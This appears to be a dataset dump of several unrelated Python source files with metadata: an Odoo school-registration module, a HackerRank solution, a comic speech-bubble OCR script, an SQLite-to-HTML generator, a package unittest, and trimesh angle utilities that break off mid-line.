else:\n return \"1\"\n\n\nif __name__ == '__main__':\n uvicorn.run(app, port=8000)\n\n start_time = time.time()\n p_list = ['proc_1', 'proc_2', 'proc_3', 'proc_4']\n pool = Process.Pool(processes=4)\n pool.map(video_task, p_list)\n pool.close()\n pool.join()\n\n print('time >> ', time.time() - start_time)","sub_path":"multiprocessing/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":17457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"201842013","text":"# -*- coding: utf-8 -*-\n#/#############################################################################\n#\n# Tech-Receptives Solutions Pvt. Ltd.\n# Copyright (C) 2004-TODAY Tech-Receptives().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n#/#############################################################################\nfrom openerp.osv import osv, fields\nfrom openerp import SUPERUSER_ID\nimport time\nfrom openerp.tools.translate import _\nfrom openerp import models, api\nimport openerp.addons.decimal_precision as dp\nfrom datetime import datetime\nfrom dateutil import relativedelta\n\nclass oschool_student(osv.osv):\n _inherit = 'res.partner'\n\n def registration_student(self, cr, uid, ids, context=None):\n if not ids: return []\n current_session_ids = self.pool.get('pos.session').search(cr, uid, [\n ('state', '!=', 'closed'),\n ('user_id', '=', uid)], context=context)\n if not current_session_ids:\n raise osv.except_osv(_('Error!'), _('Open a session first.'))\n\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_student_registration_dialog_form')\n\n inv = self.browse(cr, uid, ids[0], context=context)\n return {\n 'name':_(\"Registration Student\"),\n 'view_mode': 'form',\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'pos.order.line',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n 'target': 'new',\n 'domain': '[]',\n 'context': {\n 'default_student_id': inv.id,\n 'default_type': 'registration',\n 'type': 'registration'\n }\n }\n\n _columns = {\n 'registration_ids': fields.one2many('pos.order.line', 'student_id', 'Registration List', domain=[('type' , '=', 'registration')]),\n }\n\noschool_student()\n\nclass pos_order_line(osv.osv):\n _inherit = 'pos.order.line'\n\n def registration_refund(self, cr, uid, ids, context=None):\n if not ids:\n return []\n clone_list = []\n inv = self.browse(cr, uid, ids[0], context=context)\n if not inv.order_id:\n student = inv.student_id\n self.unlink(cr, uid,[inv.id])\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_student_form')\n\n return {\n 'name': _(\"Oschool Student\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': student.id,\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'res.partner',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n }\n if inv.order_id and inv.order_id.state == 'draft':\n student = inv.student_id\n self.pool.get('pos.order').unlink(cr, uid, inv.order_id.id)\n self.unlink(cr, uid,[inv.id])\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_student_form')\n return {\n 'name': _(\"Oschool Student\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': student.id,\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'res.partner',\n 'type': 'ir.actions.act_window',\n 'nodestroy': True,\n }\n\n if inv.refunded:\n raise osv.except_osv(_('Warning!'), _('Please select another line because it Refunded.'))\n if inv.qty < 0:\n clone_list.append(inv.order_id.id)\n else:\n line_obj = self.pool.get('pos.order.line')\n student_obj = self.pool.get('res.partner')\n\n for order in self.browse(cr, uid, ids, context=context).order_id:\n current_session_ids = self.pool.get('pos.session').search(cr, uid, [\n ('state', '!=', 'closed'),\n ('user_id', '=', uid)], context=context)\n if not current_session_ids:\n raise osv.except_osv(_('Error!'), _('To return product(s), you need to open a session that will be used to register the refund.'))\n\n clone_id = self.pool.get('pos.order').copy(cr, uid, order.id, {\n 'name': order.name + ' REFUND', # not used, name forced by create\n 'session_id': current_session_ids[0],\n 'date_order': time.strftime('%Y-%m-%d %H:%M:%S'),\n }, context=context)\n clone_list.append(clone_id)\n\n for clone in self.pool.get('pos.order').browse(cr, uid, clone_list, context=context):\n for order_line in clone.lines:\n line_obj.write(cr, uid, [order_line.id], {\n 'qty': -order_line.qty\n }, context=context)\n line_obj.write(cr, uid, inv.id, {'refunded': True}, context=context)\n student_obj.write(cr, uid, inv.student_id.id, {'academic_year_id': False,'group_id': False,'class_id': False}, context=context)\n dummy, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'oschool', 'view_oschool_refund_pos_form')\n\n return {\n 'name': _(\"Refund Registration\"),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': clone_list[0],\n 'view_id': view_id,\n 'view_type': 'form',\n 'res_model': 'pos.order',\n 'type': 'ir.actions.act_window',\n 'nodestroy': False,\n 'target': 'new',\n 'context': {\n 'subscription_month': inv.period_id.code,\n }\n }\n\n def button_registration_pay(self, cr, uid, ids, context=None):\n return self.action_payment(cr, uid, ids, context=None)\n def button_registration(self, cr, uid, ids, context=None):\n return True\n\n def action_payment(self, cr, uid, ids, context=None):\n pos_ref = self.pool.get('pos.order')\n pos_line_ref = self.pool.get('pos.order.line')\n product_obj = self.pool.get('product.product')\n journal_obj = self.pool.get('account.journal')\n pos_ids = []\n\n for line in self.pool.get('pos.order.line').browse(cr, uid, ids, context=context):\n if line.order_id:\n inv_id = line.order_id.id\n else:\n inv = {'partner_id': line.parent_id.id, 'pricelist_id': line.parent_id.property_product_pricelist.id, 'student_id': line.student_id.id}\n inv_id = pos_ref.create(cr, uid, inv, context=context)\n user = self.pool.get('res.users').browse(cr,uid,uid)\n seq_id = user.pos_config.sequence_id\n name = self.pool.get('ir.sequence').next_by_id(cr, uid, seq_id.id)\n #Ici on force le pos order de prendre la réference correcte\n #calculée en utilisant le user_id\n pos_ref.write(cr, uid,inv_id, {'name':name})\n\n journal_registration = journal_obj.search(cr, uid, [('registration', '=', True)], context=context)\n if journal_registration:\n cr.execute('update pos_order set sale_journal = %s where id = %s', (journal_registration[0], inv_id))\n\n self.write(cr, uid, [line.id], {'order_id': inv_id}, context=context)\n\n mod_obj = self.pool.get('ir.model.data')\n res = mod_obj.get_object_reference(cr, uid, 'oschool', 'view_oschool_registration_pos_form')\n res_id = res and res[1] or False\n return {\n 'name': _('Payment Registration'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'pos.order',\n 'type': 'ir.actions.act_window',\n 'target' : 'new',\n 'domain': [('id', '=', inv_id)],\n 'view_id': [res_id],\n 'res_id': inv_id,\n }\n\n def onchange_registration(self, cr, uid, ids, student_id, product_id, group_id):\n res = {'value': {}}\n if product_id:\n product = self.pool.get('product.product').browse(cr, uid, product_id)\n res['value']['academic_year_id'] = product.pos_categ_id.academic_year.id\n if not student_id:\n return res\n else:\n partner_obj = self.pool.get('res.partner')\n student = partner_obj.browse(cr, uid, student_id)\n partner_id = student.parent_id\n if not student.allow_registration:\n return {'value': {'student_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('No allow student registration.')}}\n res = self.onchange_product_id(cr, uid, ids, pricelist=partner_id.property_product_pricelist.id, product_id=product_id, qty=1, partner_id=partner_id.id)\n if product_id:\n product = self.pool.get('product.product').browse(cr, uid, product_id)\n reg = self.search(cr, uid, [\n ('type', '=', 'registration'),\n ('academic_year_id', '=', product.pos_categ_id.academic_year.id),\n ('student_id', '=', student_id),\n ('qty', '!=', -1),\n ('refunded', '=', False),\n ])\n if len(reg) > 0:\n raise osv.except_osv(_('Warning!'), _('Student already registered.'))\n return {'value': {'product_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Student already registered.')}}\n\n res['value']['academic_year_id'] = product.pos_categ_id.academic_year.id\n res['value']['registration_price'] = res['value']['price_unit']\n if group_id and product_id:\n group = self.pool.get('oschool.groups').browse(cr, uid, group_id)\n number_of_places = group.number_of_places\n reg = self.search(cr, uid, [('type', '=', 'registration'), ('academic_year_id', '=', product.pos_categ_id.academic_year.id), ('group_id', '=', group_id), ('qty', '!=', -1)])\n if number_of_places <= len(reg):\n raise osv.except_osv(_('Warning!'), _('Full Group.'))\n return {'value': {'group_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Full Group.')}}\n res['value']['remaining_places'] = number_of_places - len(reg)\n today = datetime.today()\n line_ids = self.pool.get('pos.order.line').search(cr, uid,[\n ('student_id','=',student_id),\n ('order_id','=',False),\n ('period_id.date_start','<=',datetime.strftime(today, \"%Y-%m-%d\"))\n ])\n if line_ids:\n raise osv.except_osv(_('Warning!'), _('Student have unpaid lines.'))\n\n return res\n\n def onchange_group(self, cr, uid, ids, group_id, academic_year_id, context=None):\n if not academic_year_id and group_id:\n return {'value': {'remaining_places': 0,'group_id': False}, 'warning': {'title': _('Warning!'), 'message': _('Choose Registration Type first.')}}\n if not academic_year_id or not group_id:\n return {'value': {'remaining_places': 0}}\n number_of_places = self.pool.get('oschool.groups').browse(cr, uid, group_id, context=context).number_of_places\n reg = self.search(cr, uid, [\n ('type', '=', 'registration'),\n ('academic_year_id', '=', academic_year_id),\n ('group_id', '=', group_id),\n ('qty', '>', 0),\n ('refunded','=',False)], context=context)\n\n if number_of_places <= len(reg):\n return {'value': {'group_id': False}, 'Warning': {'title': _('Warning!'), 'message': _('Full Group.')}}\n return {'value': {'remaining_places': number_of_places - len(reg)}}\n\n def create(self, cr, uid, values, context=None):\n partner_obj = self.pool.get('res.partner')\n res = super(pos_order_line, self).create(cr, uid, values, context=context)\n period_obj = self.pool.get('account.period')\n if 'type' in values:\n if values['type'] == 'registration':\n self.action_payment(cr, uid, [res], context)\n create_date = time.strftime('%Y-%m-%d')\n period_id = period_obj.search(cr, uid, [('date_start', '<=', create_date), ('date_stop', '>=', create_date), ('state', '=', 'draft')], context=context)\n if not period_id:\n raise osv.except_osv(_('Warning!'), _('There is no period defined for this date: %s.') % create_date)\n product = self.pool.get('product.product').browse(cr, uid, values['product_id'])\n self.write(cr, uid, res, {'period_id': period_id[0], 'academic_year_id': product.pos_categ_id.academic_year.id}, context=context)\n student = partner_obj.browse(cr, uid, values['student_id'])\n state_academic_year = product.pos_categ_id.academic_year.state\n if not student.academic_year_id or state_academic_year == 'current':\n partner_obj.write(cr, uid, student.id, {'academic_year_id': product.pos_categ_id.academic_year.id})\n if not student.group_id or state_academic_year == 'current':\n partner_obj.write(cr, uid, student.id, {'group_id': values['group_id']})\n if not student.class_id and values['class_id'] or state_academic_year == 'current':\n partner_obj.write(cr, uid, student.id, {'class_id': values['class_id']})\n check_minimum_age_registration = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.check_minimum_age_registration\", default=None, context=context)\n company_id =self.pool.get(\"res.users\").browse(cr, uid, uid).company_id.id\n activate_check_minimum_age_registration = self.pool.get(\"res.company\").browse(cr, uid, company_id).activate_check_minimum_age_registration\n group =self.pool.get(\"oschool.groups\").browse(cr, uid, values['group_id'])\n if check_minimum_age_registration:\n if activate_check_minimum_age_registration:\n registration_min_age_year = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.registration_min_age_year\", default=None, context=context)\n registration_min_age_month = self.pool.get(\"ir.config_parameter\").get_param(cr, uid, \"oschool.config.registration_min_age_month\", default=None, context=context)\n dt = datetime.strptime(product.pos_categ_id.academic_year.date_start, '%Y-%m-%d')\n dt2 = datetime.strptime(student.birthdate, '%Y-%m-%d')\n date_difference = relativedelta.relativedelta(dt, dt2)\n if int(date_difference.years) > int(registration_min_age_year):\n return res\n if int(date_difference.years) == int(registration_min_age_year) and int(date_difference.months) >= int(registration_min_age_month):\n return res\n else:\n raise osv.except_osv(_('Error!'), _('the student does not have the age required for registration'))\n else:\n return res\n return res\n\n def _compute(self, cr, uid, ids, field_names, arg=None, context=None, query='', query_params=()):\n res = {}\n return res\n\n def _registration_price(self, cr, uid, ids, field_names, arg=None, context=None, query='', query_params=()):\n res = {}\n for line in self.browse(cr, uid, ids, context=context):\n res = self.onchange_product_id(cr, uid, ids, pricelist=line.parent_id.property_product_pricelist.id, product_id=line.product_id.id, qty=1, partner_id=line.parent_id.id)\n res[line.id] = res['value']['price_unit']\n return res\n def unlink(self, cr, uid, ids, context=None):\n # boucle pour supprimer +eurs enregistrements aux meme temps\n for id in ids:\n line = self.browse(cr, uid, id)\n # inv = self.browse(cr, uid, ids[0], context=context)\n # #****Club presence*****\n # if line.order_id.type=='club':\n # presence_club_obj = self.pool.get('oschool.student_club_presence')\n # presence_club_ids = presence_club_obj.search(cr, uid, [])\n # presence_club_obj.unlink(cr, uid, presence_club_ids)\n # #****transport presence*****\n # if line.order_id.type=='transport':\n # presence_transport_obj = self.pool.get('oschool.student_transport_presence')\n # presence_transport_ids = presence_transport_obj.search(cr, uid, [])\n # presence_transport_obj.unlink(cr, uid, presence_transport_ids)\n # #****restaurant presence*****\n # if line.order_id.type=='restaurant':\n # presence_restaurant_obj = self.pool.get('oschool.student_restaurant_presence')\n # presence_restaurant_ids = presence_restaurant_obj.search(cr, uid, [])\n # presence_restaurant_obj.unlink(cr, uid, presence_restaurant_ids)\n # #****canteen presence*****\n # if line.order_id.type=='restaurant':\n # presence_canteen_obj = self.pool.get('oschool.student_canteen_presence')\n # presence_canteen_ids = presence_canteen_obj.search(cr, uid, [])\n # presence_canteen_obj.unlink(cr, uid, presence_canteen_ids)\n if line.order_id:\n if len(line.order_id.lines) == 1:\n order_id = line.order_id.id\n super(pos_order_line, self).unlink(cr, uid, id, context)\n self.pool.get('pos.order').unlink(cr, uid, order_id)\n else:\n super(pos_order_line, self).unlink(cr, uid, id, context)\n return True\n _columns = {\n 'remaining_places': fields.function(_compute, type='integer', string='Remaining places'),\n 'registration_price': fields.function(_registration_price, type='float', digits_compute=dp.get_precision('Product Price'), string='Price'),\n }\n\npos_order_line()\n\nclass pos_order(osv.osv):\n _inherit = 'pos.order'\n\n def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):\n mod_obj = self.pool.get('ir.model.data')\n if context is None: context = {}\n if view_type == 'form':\n if context.get('pos_id') == 'pos':\n result = mod_obj.get_object_reference(cr, uid, 'oschool', 'view_oschool_registration_pos_form')\n result = result and result[1] or False\n view_id = result\n\n res = super(pos_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)\n return res\n\n\npos_order()\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"prooaddons/oschool/oschool_registration/oschool_registration.py","file_name":"oschool_registration.py","file_ext":"py","file_size_in_byte":19684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"631043917","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the diagonalDifference function below.\ndef diagonalDifference(a):\n diag_a = 0\n diag_b = 0\n m_size = len(a)\n\n for i in range(m_size):\n diag_a = diag_a + a[i][i]\n diag_b = diag_b + a[i][m_size - (i + 1)]\n\n return abs(diag_a - diag_b)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n a = []\n\n for _ in range(n):\n a.append(list(map(int, input().rstrip().split())))\n\n result = diagonalDifference(a)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","sub_path":"warmup/diagonal-difference.py","file_name":"diagonal-difference.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630602152","text":"##################################################\n# import modules #\n##################################################\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pytesseract\nimport os\nimport csv\n\n##################################################\n# helper functions #\n##################################################\n# find all speech bubbles in the given comic page and return a list of cropped speech bubbles (with possible false positives)\ndef findSpeechBubbles(imagePath, method = 'simple'):\n # read image\n image = cv2.imread(imagePath)\n # gray scale\n imageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # filter noise\n imageGrayBlur = cv2.GaussianBlur(imageGray,(3,3),0)\n if method != 'simple':\n # recognizes more complex bubble shapes\n imageGrayBlurCanny = cv2.Canny(imageGrayBlur,50,500)\n binary = cv2.threshold(imageGrayBlurCanny,235,255,cv2.THRESH_BINARY)[1]\n else:\n # recognizes only rectangular bubbles\n binary = cv2.threshold(imageGrayBlur,235,255,cv2.THRESH_BINARY)[1]\n # find contours\n contours = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[1]\n # get the list of cropped speech bubbles\n croppedImageList = []\n for contour in contours:\n rect = cv2.boundingRect(contour)\n [x, y, w, h] = rect\n # filter out speech bubble candidates with unreasonable size\n if w < 500 and w > 60 and h < 500 and h > 25:\n # uncomment to view the contour rectangles that are detected\n # cv2.rectangle(image, (x,y), (w+x,h+y), (0,255,0), 2)\n croppedImage = image[y:y+h, x:x+w]\n croppedImageList.append(croppedImage)\n \n # uncomment to view the contour rectangles that are detected\n # cv2.imshow(\"img\", image)\n # cv2.waitKey(0)\n\n return croppedImageList\n\n# apply the ocr engine to the given image and return the recognized script where illegitimate characters are filtered out\ndef tesseract(image):\n script = pytesseract.image_to_string(image, lang = 'eng')\n for char in script:\n if char not in ' -QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm,.?!1234567890\"\":;\\'':\n script = script.replace(char,'')\n \n return script\n\n# loop through each file in the given directory, not including zip files\ndef looper(rootDir):\n fileNameList = []\n filePathList = []\n for subDir, dirs, files in os.walk(rootDir):\n for file in files:\n fileInfo = file.split('.')\n fileName, fileExten = fileInfo[0], fileInfo[-1]\n filePath = os.path.join(subDir, file)\n if fileExten == 'jpg' or fileExten == 'png' or fileExten == '.bmp':\n # if fileExten != 'zip':\n if fileName not in fileNameList:\n fileNameList.append(fileName)\n filePathList.append(filePath)\n\n return filePathList\n\n# denoise the given image with n iterations\ndef denoise(image, n):\n i = 0\n while i < n:\n image = cv2.fastNlMeansDenoisingColored(image)\n i += 1\n\n return image \n\n# append image path and script to the output csv file\ndef write_script_to_csv(imagePath, script, outputFilePath):\n with open(outputFilePath, 'a', encoding = \"utf-8\", newline = \"\") as f:\n writer = csv.writer(f)\n newRow = [imagePath, script]\n writer.writerow(newRow)\n\n##################################################\n# main work #\n##################################################\n# set working directory\npath = \"\"\nos.chdir(path)\n\n# output file path and directory to be looped through\noutputFilePath = 'comic-script.csv'\nrootDir = ''\n\n# initialize output file\nwith open(outputFilePath, 'w',newline = \"\") as f:\n writer = csv.writer(f)\n writer.writerow(['filePath', 'script'])\n\n# for each image in the given directory, process each speech bubble found and feed it to the ocr engine\nfor imagePath in looper(rootDir):\n print(imagePath)\n # find speech bubbles in each image\n try:\n croppedImageList = findSpeechBubbles(imagePath, method = 'simple')\n except:\n continue\n scriptList = []\n for croppedImage in croppedImageList:\n # enlarge\n croppedImage = cv2.resize(croppedImage, (0,0), fx = 2, fy = 2)\n # denoise\n croppedImage = denoise(croppedImage, 2)\n kernel = np.ones((1, 1), np.uint8)\n croppedImage = cv2.dilate(croppedImage, kernel, iterations = 50)\n croppedImage = cv2.erode(croppedImage, kernel, iterations = 50)\n\n # turn gray\n croppedImageGray = cv2.cvtColor(croppedImage, cv2.COLOR_BGR2GRAY)\n # Gaussian filter\n croppedImageGrayBlur = cv2.GaussianBlur(croppedImageGray,(5,5),0)\n # edge detection\n croppedImageGrayBlurLaplacian = cv2.Laplacian(croppedImageGrayBlur,cv2.CV_64F)\n # adjust contrast and brightness\n croppedImageGrayBlurLaplacian = np.uint8(np.clip((10 * croppedImageGrayBlurLaplacian + 10), 0, 255))\n\n # pass cropped image to the ocr engine\n script = tesseract(croppedImageGrayBlurLaplacian)\n if script != '' and script not in scriptList:\n scriptList.append(script)\n print(script)\n # append image path and script to the output csv file\n write_script_to_csv(imagePath, script, outputFilePath)","sub_path":"comics/comic_bubble_to_text.py","file_name":"comic_bubble_to_text.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120797423","text":"#!/usr/bin/env python3\nimport sqlite3\nimport os\nfrom bottle import template\nhtml=\"pimark.htm\"\nhtml2=\"gmpimark.htm\"\nhtml3=\"mtgmpimark.htm\"\n\ndef makehtml():\n db=sqlite3.connect(\"test.db\")\n cur=db.execute(\"select * from pimark order by PIC asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"C\")\n if os.path.exists(html):\n os.remove(html)\n\n fi=open(html,'w')\n fi.write(output)\n fi.close()\n print(\"::make html1 ok\")\n \n cur=db.execute(\"select * from pimark order by GMPI asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"GMP\")\n if os.path.exists(html2):\n os.remove(html2)\n\n fi=open(html2,'w')\n fi.write(output)\n fi.close()\n print(\"::make html2 ok\")\n\n cur=db.execute(\"select * from pimark order by MTGMPI asc\")\n res=cur.fetchall()\n output=template(\"makehtml\",rows=res,pi=\"MtGMP\")\n if os.path.exists(html3):\n os.remove(html3)\n\n fi=open(html3,'w')\n fi.write(output)\n fi.close()\n print(\"::make html3 ok\")\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n makehtml()\n","sub_path":"server/makehtml.py","file_name":"makehtml.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"547160503","text":"\"\"\"\n@brief test log(time=200s)\n\nskip this test for regular run\n\"\"\"\n\nimport sys\nimport os\nimport unittest\n\ntry:\n import src\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\")))\n if path not in sys.path:\n sys.path.append(path)\n import src\n\ntry:\n import pyquickhelper as skip_\nexcept ImportError:\n path = os.path.normpath(\n os.path.abspath(\n os.path.join(\n os.path.split(__file__)[0],\n \"..\",\n \"..\",\n \"..\",\n \"pyquickhelper\",\n \"src\")))\n if path not in sys.path:\n sys.path.append(path)\n if \"PYQUICKHELPER\" in os.environ and len(os.environ[\"PYQUICKHELPER\"]) > 0:\n sys.path.append(os.environ[\"PYQUICKHELPER\"])\n import pyquickhelper as skip_\n\n\nfrom src.pymyinstall.packaged import small_set, extended_set, ensae_fullset\nfrom pyquickhelper.loghelper import fLOG\n\n\nclass TestDifference(unittest.TestCase):\n\n def test_diff(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n\n name = set(_.name for _ in small_set())\n keep = []\n for mod in extended_set():\n if mod.name not in name:\n keep.append(mod)\n assert len(keep) > 0\n\n for mod in keep:\n if mod.mname is None:\n fLOG(\n \"ModuleInstall('{0}', '{1}'),\".format(mod.name, mod.kind))\n else:\n fLOG(\"ModuleInstall('{0}', '{1}', mname='{2}'),\".format(\n mod.name, mod.kind, mod.mname))\n\n def test_diff2(self):\n fLOG(\n __file__,\n self._testMethodName,\n OutputPrint=__name__ == \"__main__\")\n res = ensae_fullset()\n count = {}\n for mod in res:\n count[mod.name] = 1\n\n assert \"pyquickhelper\" in count\n assert \"code_beatrix\" in count\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"_unittests/ut_packaged/test_diff.py","file_name":"test_diff.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"157068373","text":"# Etienne St-Onge\n\nimport numpy as np\nimport scipy\n\nfrom scipy.sparse import csc_matrix\n\nfrom trimeshpy.math.util import square_length\nfrom trimeshpy.math.mesh_map import edge_triangle_map\n\nfrom trimeshpy.math.mesh_global import G_DTYPE, G_ATOL\n\n\n# Triangle Angles Functions\n#\n# vi\n# |\\\n# |ai\n# | \\\n# | \\\n# | \\\n# | \\\n# |aj ak\\\n# vj------vk\n#\n# Triangles : [[ i, j, k ], ....]\n# Angles : [[ ai, aj, ak ], ....]\n#\ndef triangle_angle(triangles, vertices):\n if scipy.sparse.__name__ in type(vertices).__module__:\n vertices = vertices.toarray()\n # get theta angles for each points in each triangles\n e_sqr_length = square_length(vertices[np.roll(triangles, 1, axis=1)] -\n vertices[np.roll(triangles, -1, axis=1)],\n axis=2)\n e_length = np.sqrt(e_sqr_length)\n\n # get the every angles of each triangles (opposite angles)\n tri_angles = np.zeros_like(triangles, dtype=G_DTYPE)\n tri_angles[:, 0] = np.arccos((e_sqr_length[:, 1] + e_sqr_length[:, 2] - e_sqr_length[:, 0]) / (2.0 * e_length[:, 1] * e_length[:, 2]))\n tri_angles[:, 1] = np.arccos((e_sqr_length[:, 0] + e_sqr_length[:, 2] - e_sqr_length[:, 1]) / (2.0 * e_length[:, 0] * e_length[:, 2]))\n tri_angles[:, 2] = (np.pi - tri_angles[:, 0] - tri_angles[:, 1])\n\n if not np.allclose(\n np.arccos((e_sqr_length[:, 0] + e_sqr_length[:, 1] - e_sqr_length[:, 2]) / (2.0 * e_length[:, 0] * e_length[:, 1])), tri_angles[:, 2], atol=G_ATOL):\n print(\"WARNING :: triangle_angle\")\n\n return tri_angles\n\n\ndef triangle_is_obtuse(triangles, vertices):\n return np.max(triangle_angle(triangles, vertices), axis=1) - G_ATOL > (np.pi / 2.0)\n\n\ndef triangle_is_acute(triangles, vertices):\n return np.max(triangle_angle(triangles, vertices), axis=1) + G_ATOL < (np.pi / 2.0)\n\n\ndef triangle_is_right(triangles, vertices):\n return np.abs(np.max(triangle_angle(triangles, vertices), axis=1) - (np.pi / 2.0)) < G_ATOL\n\n\n# Edge Angles Functions\n#\n# for the edge e[i,j] = v[i] -> v[j]\n# Theta(T), Alpha(A), Gamma(Y)\n#\n# vj\n# /|\\\n# / | \\\n# Yij|Tji\n# / | \\\n# / ^ \\\n# / | \\\n# / | \\\n# / | \\\n# /Aij Tij|Yji Aji\\\n# vk ---------o--------- vl\n# vi\n#\ndef edge_theta_angle(triangles, vertices):\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the theta of the next edge\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n theta = np.hstack([t_angles[:, 0], t_angles[:, 1], t_angles[:, 2]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n theta_map = csc_matrix((theta, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return theta_map\n\n\ndef edge_alpha_angle(triangles, vertices):\n # alpha_map[i,j] = Aij\n # alpha_map[i,j] = beta_map[j,i]\n\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the Alpha Beta angle for each edge in a connectivity matrix\n # get (directed) edge list (row = i)(col=j) alpha\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n alpha = np.hstack([t_angles[:, 2], t_angles[:, 0], t_angles[:, 1]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n alpha_map = csc_matrix((alpha, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return alpha_map\n\n\ndef edge_gamma_angle(triangles, vertices):\n # get the every angles of each triangles\n t_angles = triangle_angle(triangles, vertices)\n\n # Get the theta of the next edge\n vts_i = np.hstack([triangles[:, 0], triangles[:, 1], triangles[:, 2]])\n vts_j = np.hstack([triangles[:, 1], triangles[:, 2], triangles[:, 0]])\n gamma = np.hstack([t_angles[:, 1], t_angles[:, 2], t_angles[:, 0]])\n # for the beta angle : beta [j,i] = alpha[i,j]\n gamma_map = csc_matrix((gamma, (vts_i, vts_j)), shape=(vertices.shape[0], vertices.shape[0]))\n return gamma_map\n\n\ndef cotan_alpha_beta_angle(triangles, vertices):\n # cotan of all angle = (tan(a))^-1\n ctn_ab_angles = scipy.tan(edge_alpha_angle(triangles, vertices))\n ctn_ab_angles.data **= -1\n # matrix = cot(a) + cot(b) = cot(a_ij) + cot(b_ji)\n ctn_ab_angles = ctn_ab_angles + ctn_ab_angles.T\n return ctn_ab_angles\n\n\ndef edge_triangle_is_obtuse(triangles, vertices):\n tri_is_obtuse = triangle_is_obtuse(triangles, vertices)\n vv_t_is_obtuse = edge_triangle_map(triangles, vertices)\n vv_t_is_obtuse.data = tri_is_obtuse[vv_t_is_obtuse.data]\n return vv_t_is_obtuse\n\n\ndef edge_triangle_is_acute(triangles, vertices):\n tri_is_acute = triangle_is_acute(triangles, vertices)\n vv_t_is_acute = edge_triangle_map(triangles, vertices)\n vv_t_is_acute.data = tri_is_acute[vv_t_is_acute.data]\n return vv_t_is_acute\n\n\ndef edge_theta_is_obtuse(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data - G_ATOL > (np.pi / 2.0))\n return theta\n\n\ndef edge_theta_is_acute(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data + G_ATOL < (np.pi / 2.0))\n return theta\n\n\ndef edge_slope_angle(triangles, vertices):\n theta = edge_theta_angle(triangles, vertices)\n theta.data = (theta.data + G_ATOL < (np.pi / 2.0))\n return theta\n\n\n# edge slope angle ( triangle's normal angle)\ndef edge_triangle_normal_angle(triangles, vertices):\n from trimeshpy.math.normal import triangles_normal\n vts_i = 